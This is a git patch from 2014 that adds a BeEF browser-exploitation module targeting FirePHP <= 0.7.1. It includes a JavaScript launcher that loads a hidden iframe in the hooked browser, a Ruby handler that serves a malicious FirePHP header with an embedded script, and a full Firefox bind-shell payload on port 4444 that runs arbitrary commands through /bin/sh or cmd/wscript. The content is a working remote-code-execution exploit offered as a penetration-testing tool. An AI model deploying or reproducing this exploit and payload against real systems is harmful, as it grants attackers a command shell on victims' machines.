From abe1370a50d0210d22677c29cd05a1b1df377057 Mon Sep 17 00:00:00 2001
From: Brendan Coles <bcoles@gmail.com>
Date: Mon, 5 May 2014 10:32:59 +0000
Subject: [PATCH] Add FirePHP <= 0.7.1 RCE module

@Wireghoul

Fixes issue #885
---
 modules/exploits/firephp/command.js  |  26 +++++
 modules/exploits/firephp/config.yaml |  19 +++
 modules/exploits/firephp/module.rb   |  70 +++++++++++
 modules/exploits/firephp/payload.js  | 168 +++++++++++++++++++++++++++
 4 files changed, 283 insertions(+)
 create mode 100644 modules/exploits/firephp/command.js
 create mode 100644 modules/exploits/firephp/config.yaml
 create mode 100644 modules/exploits/firephp/module.rb
 create mode 100644 modules/exploits/firephp/payload.js

diff --git a/modules/exploits/firephp/command.js b/modules/exploits/firephp/command.js
new file mode 100644
index 000000000..cd0bb84d0
--- /dev/null
+++ b/modules/exploits/firephp/command.js
@@ -0,0 +1,26 @@
+//
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+  // detect firebug
+  if (window.console && (window.console.firebug || window.console.exception)) {
+    var firephp_<%= @command_id %> = beef.dom.createInvisibleIframe();
+    firephp_<%= @command_id %>.src = "<%= @beef_url %>/firephp";
+    beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+  } else {
+    beef.net.send("<%= @command_url %>", <%= @command_id %>, "error=Module did not run. Firebug is not open in the hooked browser.");
+    return;
+  }
+
+  // clean up
+  cleanup = function() {
+     document.body.removeChild(firephp_<%= @command_id %>);
+  }
+  setTimeout("cleanup()", 10000);
+
+});
+
diff --git a/modules/exploits/firephp/config.yaml b/modules/exploits/firephp/config.yaml
new file mode 100644
index 000000000..efa0eacc9
--- /dev/null
+++ b/modules/exploits/firephp/config.yaml
@@ -0,0 +1,19 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+###
+# Exploit: http://www.justanotherhacker.com/advisories/jahx132.html
+###
+beef:
+    module:
+        firephp_code_exec:
+            enable: true
+            category: "Exploits"
+            name: "Firephp 0.7.1 RCE"
+            description: "Exploit FirePHP <= 0.7.1 to execute arbitrary JavaScript within the trusted 'chrome://' zone.<br/><br/>This module forces the browser to load '/firephp' on the public BeEF interface.<br/><br/>The payload is executed silently once the user moves the mouse over the array returned for 'http://[BeEF]/firephp' in Firebug.<br/><br/><b>Note:</b> Use msfpayload to generate JavaScript payloads. The default payload binds a shell on port 4444.<br/>See 'modules/exploits/firephp/payload.js'"
+            authors: ["Wireghoul", "bcoles"]
+            target:
+                user_notify: ["FF"]
+                not_working: ["All"]
diff --git a/modules/exploits/firephp/module.rb b/modules/exploits/firephp/module.rb
new file mode 100644
index 000000000..41999a8cb
--- /dev/null
+++ b/modules/exploits/firephp/module.rb
@@ -0,0 +1,70 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+###
+# Exploit: http://www.justanotherhacker.com/advisories/jahx132.html
+###
+class Firephp_code_exec < BeEF::Core::Command
+
+  def pre_send
+    rand_str = rand(32**10).to_s(32)
+
+    # load payload.js file
+    # generate payload:
+    #  msfpayload firefox/shell_bind_tcp LPORT=4444 R > payload.js
+    payload = ""
+    f = File.open("#{$root_dir}/modules/exploits/firephp/payload.js")
+    f.each_line do |line|
+      payload << line
+    end
+    f.close
+
+    # construct exploit+payload HTTP response
+    exploit = {
+      "RequestHeaders" => {
+        "1"=>"#{rand(10)}",
+        "2"=>"#{rand(10)}",
+        "3"=>"#{rand(10)}",
+        "4"=>"#{rand(10)}",
+        "5"=>"#{rand(10)}",
+        "6"=>"#{rand(10)}",
+        "7"=>"#{rand(10)}",
+        "8"=>"#{rand(10)}",
+        "9"=>"#{rand(10)}",
+        "<script>#{payload}<\/SCRIPT>" => rand_str
+      }
+    }.to_json
+
+    # mount exploit+payload at /firephp
+    # @todo use Router class instead of bind_raw()
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_raw('200',
+      {
+        'Content-Type'       => 'text/html',
+        'X-Wf-Protocol-1'    => 'http://meta.wildfirehq.org/Protocol/JsonStream/0.2',
+        'X-Wf-1-Plugin-1'    => 'http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3',
+        'X-Wf-1-Structure-1' => 'http://meta.firephp.org/Wildfire/Structure/FirePHP/Dump/0.1',
+        'X-Wf-1-1-1-1'       => "#{exploit.length}|#{exploit}|\r\n"
+      },
+      rand_str,   # HTTP body
+      '/firephp', # URI mount point
+      -1
+    )
+  end
+
+  def self.options
+    configuration = BeEF::Core::Configuration.instance
+    proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
+    beef_host = configuration.get("beef.http.public")      || configuration.get("beef.http.host")
+    beef_port = configuration.get("beef.http.public_port") || configuration.get("beef.http.port")
+    url = "#{proto}://#{beef_host}:#{beef_port}"
+    return [
+      { 'name' => 'beef_url', 'description' => 'BeEF interface URL', 'ui_label' => 'BeEF URL', 'value' => url, 'width' => '200px' }
+    ]
+  end
+
+  def post_execute
+    save({'result' => @datastore['result']})
+  end
+
+end
diff --git a/modules/exploits/firephp/payload.js b/modules/exploits/firephp/payload.js
new file mode 100644
index 000000000..165997369
--- /dev/null
+++ b/modules/exploits/firephp/payload.js
@@ -0,0 +1,168 @@
+(function(){
+
+      Components.utils.import("resource://gre/modules/NetUtil.jsm");
+      var lport = 4444;
+      var rhost = "";
+      var serverSocket = Components.classes["@mozilla.org/network/server-socket;1"]
+                             .createInstance(Components.interfaces.nsIServerSocket);
+      serverSocket.init(lport, false, -1);
+
+      var listener = {
+        onSocketAccepted: function(serverSocket, clientSocket) {
+          var outStream = clientSocket.openOutputStream(0, 0, 0);
+          var inStream = clientSocket.openInputStream(0, 0, 0);
+          var pump = Components.classes["@mozilla.org/network/input-stream-pump;1"]
+                     .createInstance(Components.interfaces.nsIInputStreamPump);
+          pump.init(inStream, -1, -1, 0, 0, true);
+          pump.asyncRead(clientListener(outStream), null);
+        }
+      };
+
+      var clientListener = function(outStream) {
+        return {
+          onStartRequest: function(request, context) {},
+          onStopRequest: function(request, context) {},
+          onDataAvailable: function(request, context, stream, offset, count) {
+            var data = NetUtil.readInputStreamToString(stream, count).trim();
+            runCmd(data, function(err, output) {
+              if(!err) outStream.write(output, output.length);
+            });
+          }
+        };
+      };
+
+      
+      
+      var readFile = function(path) {
+        try {
+          var file = Components.classes["@mozilla.org/file/local;1"]
+                   .createInstance(Components.interfaces.nsILocalFile);
+          file.initWithPath(path);
+
+          var fileStream = Components.classes["@mozilla.org/network/file-input-stream;1"]
+                           .createInstance(Components.interfaces.nsIFileInputStream);
+          fileStream.init(file, 1, 0, false);
+
+          var binaryStream = Components.classes["@mozilla.org/binaryinputstream;1"]
+                             .createInstance(Components.interfaces.nsIBinaryInputStream);
+          binaryStream.setInputStream(fileStream);
+          var array = binaryStream.readByteArray(fileStream.available());
+
+          binaryStream.close();
+          fileStream.close();
+          file.remove(true);
+
+          return array.map(function(aItem) { return String.fromCharCode(aItem); }).join("");
+        } catch (e) { return ""; }
+      };
+    
+      
+      var setTimeout = function(cb, delay) {
+        var timer = Components.classes["@mozilla.org/timer;1"].createInstance(Components.interfaces.nsITimer);
+        timer.initWithCallback({notify:cb}, delay, Components.interfaces.nsITimer.TYPE_ONE_SHOT);
+        return timer;
+      };
+    
+
+      var ua = Components.classes["@mozilla.org/network/protocol;1?name=http"]
+        .getService(Components.interfaces.nsIHttpProtocolHandler).userAgent;
+      var windows = (ua.indexOf("Windows")>-1);
+      var svcs = Components.utils.import("resource://gre/modules/Services.jsm");
+      var jscript = ({"src":"\n      var b64 = WScript.arguments(0);\n      var dom = new ActiveXObject(\"MSXML2.DOMDocument.3.0\");\n      var el  = dom.createElement(\"root\");\n      el.dataType = \"bin.base64\"; el.text = b64; dom.appendChild(el);\n      var stream = new ActiveXObject(\"ADODB.Stream\");\n      stream.Type=1; stream.Open(); stream.Write(el.nodeTypedValue);\n      stream.Position=0; stream.type=2; stream.CharSet = \"us-ascii\"; stream.Position=0;\n      var cmd = stream.ReadText();\n      (new ActiveXObject(\"WScript.Shell\")).Run(cmd, 0, true);\n    "}).src;
+      var runCmd = function(cmd, cb) {
+        cb = cb || (function(){});
+
+        if (cmd.trim().length == 0) {
+          setTimeout(function(){ cb("Command is empty string ('')."); });
+          return;
+        }
+
+        var js = (/^\s*\[JAVASCRIPT\]([\s\S]*)\[\/JAVASCRIPT\]/g).exec(cmd.trim());
+        if (js) {
+          var tag = "[!JAVASCRIPT]";
+          var sync = true;  /* avoid zalgo's reach */
+          var sent = false;
+          var retVal = null;
+
+          try {
+            retVal = Function('send', js[1])(function(r){
+              if (sent) return;
+              sent = true;
+              if (r) {
+                if (sync) setTimeout(function(){ cb(false, r+tag+"\n"); });
+                else      cb(false, r+tag+"\n");
+              }
+            });
+          } catch (e) { retVal = e.message; }
+
+          sync = false;
+
+          if (retVal && !sent) {
+            sent = true;
+            setTimeout(function(){ cb(false, retVal+tag+"\n"); });
+          }
+
+          return;
+        }
+
+        var shEsc = "\\$&";
+        var shPath = "/bin/sh -c";
+
+        if (windows) {
+          shPath = "cmd /c";
+          shEsc = "\^$&";
+          var jscriptFile = Components.classes["@mozilla.org/file/directory_service;1"]
+            .getService(Components.interfaces.nsIProperties)
+            .get("TmpD", Components.interfaces.nsIFile);
+          jscriptFile.append('DgPpX5C0Cqj8lWozDd.js');
+          var stream = Components.classes["@mozilla.org/network/safe-file-output-stream;1"]
+            .createInstance(Components.interfaces.nsIFileOutputStream);
+          stream.init(jscriptFile, 0x04 | 0x08 | 0x20, 0666, 0);
+          stream.write(jscript, jscript.length);
+          if (stream instanceof Components.interfaces.nsISafeOutputStream) {
+            stream.finish();
+          } else {
+            stream.close();
+          }
+        }
+
+        var stdoutFile = "Bf6Seq5KPkR5MZLH";
+
+        var stdout = Components.classes["@mozilla.org/file/directory_service;1"]
+          .getService(Components.interfaces.nsIProperties)
+          .get("TmpD", Components.interfaces.nsIFile);
+        stdout.append(stdoutFile);
+
+        if (windows) {
+          var shell = shPath+" "+cmd;
+          shell = shPath+" "+shell.replace(/\W/g, shEsc)+" >"+stdout.path+" 2>&1";
+          var b64 = svcs.btoa(shell);
+        } else {
+          var shell = shPath+" "+cmd.replace(/\W/g, shEsc);
+          shell = shPath+" "+shell.replace(/\W/g, shEsc) + " >"+stdout.path+" 2>&1";
+        }
+        var process = Components.classes["@mozilla.org/process/util;1"]
+          .createInstance(Components.interfaces.nsIProcess);
+        var sh = Components.classes["@mozilla.org/file/local;1"]
+                   .createInstance(Components.interfaces.nsILocalFile);
+
+        if (windows) {
+          sh.initWithPath("C:\\Windows\\System32\\wscript.exe");
+          process.init(sh);
+          var args = [jscriptFile.path, b64];
+          process.run(true, args, args.length);
+          jscriptFile.remove(true);
+          setTimeout(function(){cb(false, cmd+"\n"+readFile(stdout.path));});
+        } else {
+          sh.initWithPath("/bin/sh");
+          process.init(sh);
+          var args = ["-c", shell];
+          process.run(true, args, args.length);
+          setTimeout(function(){cb(false, readFile(stdout.path));});
+        }
+      };
+    
+
+      serverSocket.asyncListen(listener);
+
+})();